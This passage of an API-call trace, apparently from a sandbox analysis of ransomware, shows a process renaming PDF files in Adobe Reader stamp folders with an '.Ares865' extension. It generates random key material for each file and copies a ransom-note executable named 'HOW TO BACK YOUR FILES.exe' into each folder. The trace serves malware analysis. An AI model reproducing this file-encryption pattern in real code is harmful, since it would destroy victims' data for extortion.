[0173.596] lstrcmpiW (lpString1="ces.pdf", lpString2="Ares865") returned 1 [0173.596] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\Faces.pdf.Ares865") returned 97 [0173.596] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\Faces.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ukr\\faces.pdf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\Faces.pdf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ukr\\faces.pdf.ares865"), dwFlags=0x1) returned 1 [0173.598] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\Faces.pdf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ukr\\faces.pdf.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0173.598] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=33013) returned 1 [0173.598] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0173.599] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0173.599] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.602] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0173.603] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0173.603] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.604] lstrcpyW (in: lpString1=0x2cce4a0, lpString2="Pointers.pdf" | out: lpString1="Pointers.pdf") returned="Pointers.pdf" [0173.604] lstrlenW (lpString="Pointers.pdf") returned 12 [0173.604] lstrlenW (lpString="Ares865") returned 7 [0173.604] lstrcmpiW (lpString1="ers.pdf", lpString2="Ares865") returned 1 [0173.604] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\Pointers.pdf.Ares865") returned 100 [0173.604] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\Pointers.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ukr\\pointers.pdf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\Pointers.pdf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ukr\\pointers.pdf.ares865"), dwFlags=0x1) returned 1 [0173.606] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\Pointers.pdf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ukr\\pointers.pdf.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0173.606] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=46897) returned 1 [0173.607] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0173.607] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0173.607] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.612] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0173.612] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0173.612] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.613] lstrcpyW (in: lpString1=0x2cce4a0, lpString2="SignHere.pdf" | out: lpString1="SignHere.pdf") returned="SignHere.pdf" [0173.613] lstrlenW (lpString="SignHere.pdf") returned 12 [0173.613] lstrlenW (lpString="Ares865") returned 7 [0173.613] lstrcmpiW (lpString1="ere.pdf", lpString2="Ares865") returned 1 [0173.614] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\SignHere.pdf.Ares865") returned 100 [0173.614] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\SignHere.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ukr\\signhere.pdf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\SignHere.pdf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ukr\\signhere.pdf.ares865"), dwFlags=0x1) returned 1 [0173.616] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\SignHere.pdf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ukr\\signhere.pdf.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0173.616] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=45449) returned 1 [0173.616] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0173.617] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0173.617] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.621] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0173.622] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0173.622] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.623] lstrcpyW (in: lpString1=0x2cce4a0, lpString2="Standard.pdf" | out: lpString1="Standard.pdf") returned="Standard.pdf" [0173.623] lstrlenW (lpString="Standard.pdf") returned 12 [0173.623] lstrlenW (lpString="Ares865") returned 7 [0173.623] lstrcmpiW (lpString1="ard.pdf", lpString2="Ares865") returned -1 [0173.623] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\Standard.pdf.Ares865") returned 100 [0173.624] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\Standard.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ukr\\standard.pdf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\Standard.pdf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ukr\\standard.pdf.ares865"), dwFlags=0x1) returned 1 [0173.625] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\Standard.pdf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ukr\\standard.pdf.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0173.625] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=115957) returned 1 [0173.626] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0173.626] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0173.626] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.637] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0173.637] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0173.637] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.639] lstrcpyW (in: lpString1=0x2cce4a0, lpString2="StandardBusiness.pdf" | out: lpString1="StandardBusiness.pdf") returned="StandardBusiness.pdf" [0173.639] lstrlenW (lpString="StandardBusiness.pdf") returned 20 [0173.639] lstrlenW (lpString="Ares865") returned 7 [0173.639] lstrcmpiW (lpString1="ess.pdf", lpString2="Ares865") returned 1 [0173.640] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\StandardBusiness.pdf.Ares865") returned 108 [0173.640] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\StandardBusiness.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ukr\\standardbusiness.pdf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\StandardBusiness.pdf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ukr\\standardbusiness.pdf.ares865"), dwFlags=0x1) returned 1 [0173.642] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\UKR\\StandardBusiness.pdf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ukr\\standardbusiness.pdf.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0173.642] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=362641) returned 1 [0173.642] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0173.643] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0173.643] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.663] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0173.664] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0173.664] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.669] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR" [0173.669] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR" [0173.669] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0173.669] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\tur\\how to back your files.exe"), bFailIfExists=1) returned 0 [0173.673] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0173.673] GetLastError () returned 0x0 [0173.673] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0173.674] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x806266a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54a9e220, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54a9e220, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0173.674] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0173.674] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0173.674] lstrcpyW (in: lpString1=0x2cce4a0, lpString2="Dynamic.pdf" | out: lpString1="Dynamic.pdf") returned="Dynamic.pdf" [0173.675] lstrlenW (lpString="Dynamic.pdf") returned 11 [0173.675] lstrlenW (lpString="Ares865") returned 7 [0173.675] lstrcmpiW (lpString1="mic.pdf", lpString2="Ares865") returned 1 [0173.675] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR\\Dynamic.pdf.Ares865") returned 99 [0173.675] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR\\Dynamic.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\tur\\dynamic.pdf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR\\Dynamic.pdf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\tur\\dynamic.pdf.ares865"), dwFlags=0x1) returned 1 [0173.677] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR\\Dynamic.pdf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\tur\\dynamic.pdf.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0173.677] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=57980) returned 1 [0173.678] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0173.678] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0173.678] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.683] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0173.684] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0173.684] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.685] lstrcpyW (in: lpString1=0x2cce4a0, lpString2="Faces.pdf" | out: lpString1="Faces.pdf") returned="Faces.pdf" [0173.685] lstrlenW (lpString="Faces.pdf") returned 9 [0173.685] lstrlenW (lpString="Ares865") returned 7 [0173.685] lstrcmpiW (lpString1="ces.pdf", lpString2="Ares865") returned 1 [0173.686] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR\\Faces.pdf.Ares865") returned 97 [0173.686] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR\\Faces.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\tur\\faces.pdf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR\\Faces.pdf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\tur\\faces.pdf.ares865"), dwFlags=0x1) returned 1 [0173.687] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR\\Faces.pdf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\tur\\faces.pdf.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0173.688] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=33013) returned 1 [0173.688] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0173.689] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0173.689] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.693] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0173.693] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0173.693] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.694] lstrcpyW (in: lpString1=0x2cce4a0, lpString2="Pointers.pdf" | out: lpString1="Pointers.pdf") returned="Pointers.pdf" [0173.694] lstrlenW (lpString="Pointers.pdf") returned 12 [0173.694] lstrlenW (lpString="Ares865") returned 7 [0173.694] lstrcmpiW (lpString1="ers.pdf", lpString2="Ares865") returned 1 [0173.695] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR\\Pointers.pdf.Ares865") returned 100 [0173.695] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR\\Pointers.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\tur\\pointers.pdf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR\\Pointers.pdf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\tur\\pointers.pdf.ares865"), dwFlags=0x1) returned 1 [0173.697] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR\\Pointers.pdf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\tur\\pointers.pdf.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0173.697] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=46897) returned 1 [0173.697] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0173.698] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0173.698] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.702] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0173.703] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0173.703] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.704] lstrcpyW (in: lpString1=0x2cce4a0, lpString2="SignHere.pdf" | out: lpString1="SignHere.pdf") returned="SignHere.pdf" [0173.704] lstrlenW (lpString="SignHere.pdf") returned 12 [0173.704] lstrlenW (lpString="Ares865") returned 7 [0173.704] lstrcmpiW (lpString1="ere.pdf", lpString2="Ares865") returned 1 [0173.704] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR\\SignHere.pdf.Ares865") returned 100 [0173.704] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR\\SignHere.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\tur\\signhere.pdf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR\\SignHere.pdf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\tur\\signhere.pdf.ares865"), dwFlags=0x1) returned 1 [0173.706] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR\\SignHere.pdf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\tur\\signhere.pdf.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0173.706] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=39211) returned 1 [0173.706] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0173.707] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0173.707] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.711] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0173.712] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0173.712] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.713] lstrcpyW (in: lpString1=0x2cce4a0, lpString2="Standard.pdf" | out: lpString1="Standard.pdf") returned="Standard.pdf" [0173.713] lstrlenW (lpString="Standard.pdf") returned 12 [0173.713] lstrlenW (lpString="Ares865") returned 7 [0173.713] lstrcmpiW (lpString1="ard.pdf", lpString2="Ares865") returned -1 [0173.713] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR\\Standard.pdf.Ares865") returned 100 [0173.713] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR\\Standard.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\tur\\standard.pdf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR\\Standard.pdf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\tur\\standard.pdf.ares865"), dwFlags=0x1) returned 1 [0173.715] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\TUR\\Standard.pdf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\tur\\standard.pdf.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0173.715] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=115957) returned 1 [0173.715] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0173.716] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0173.716] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.724] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0173.725] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: 